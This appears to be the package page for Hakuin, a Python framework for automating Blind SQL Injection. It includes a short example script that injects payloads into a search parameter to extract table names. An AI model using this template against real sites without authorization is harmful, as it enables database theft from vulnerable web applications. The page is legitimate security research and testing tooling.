Blind SQL Injection optimization and automation framework
Project description
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the extraction logic and allows users to easily and efficiently dump databases from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, statistical modeling, parallelism, ternary queries, and more.
Hakuin has been presented at esteemed academic and industrial conferences:
- BSides, Bratislava, 2025
- BlackHat MEA, Riyadh, 2023
- Hack in the Box, Phuket, 2023
- IEEE S&P Workshop on Offsensive Technology (WOOT), 2023
More information can be found in our paper and slides.
Installation
To install Hakuin, simply run:
pip3 install hakuin
Command Line Tool
Hakuin ships with an intuitive tool that offers most of Hakuin's features directly from the command line:
hk -h
Custom Scripting
Sometimes, BSQLI vulnerabilities are too tricky to exploit from the command line and require custom scripting. This is where Hakuin shines, allowing you to customize absolutely everything - the injection logic, the inference logic, and even the queries.
Here is a minimal example:
import asyncio
import aiohttp
from hakuin import Extractor, Requester
class SimpleRequester(Requester):
async def request(self, query, ctx):
payload = query.render(ctx)
url = f'http://target.com/users?search=XXX" OR ({payload})--'
async with aiohttp.request('GET', url) as resp:
return resp.status == 200
async def main():
requester = SimpleRequester():
ext = Extractor(requester=requester, dbms='sqlite')
data = await ext.extract_table_names()
print(data)
asyncio.run(main())
Make sure to go through our tutorial.
For Researchers
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
Cite Hakuin
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file hakuin-0.2.1.tar.gz.
File metadata
- Download URL: hakuin-0.2.1.tar.gz
- Upload date:
- Size: 5.1 MB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.10.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
f6abc84233e15f4d6d52172801a9d53ef8f0d559a785ebf79c63a4bb7727d301
|
|
| MD5 |
9d2f8952976ee0d985784ede31d94101
|
|
| BLAKE2b-256 |
4347eca9a178eb261050f9a8d39ba7aa4c4b48212e40eee9481cae871d21fadd
|
File details
Details for the file hakuin-0.2.1-py3-none-any.whl.
File metadata
- Download URL: hakuin-0.2.1-py3-none-any.whl
- Upload date:
- Size: 5.2 MB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.10.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
e91f9a589cb3719e9514fb0070c22c05956769654d3c8df2f0b3b8f61f16f918
|
|
| MD5 |
27ae96bb25e27613cc62efb66883feb1
|
|
| BLAKE2b-256 |
001a015b6b15d4550f2d976b61ff89c3af23baab1d3601e59fcf4025076a8cf8
|
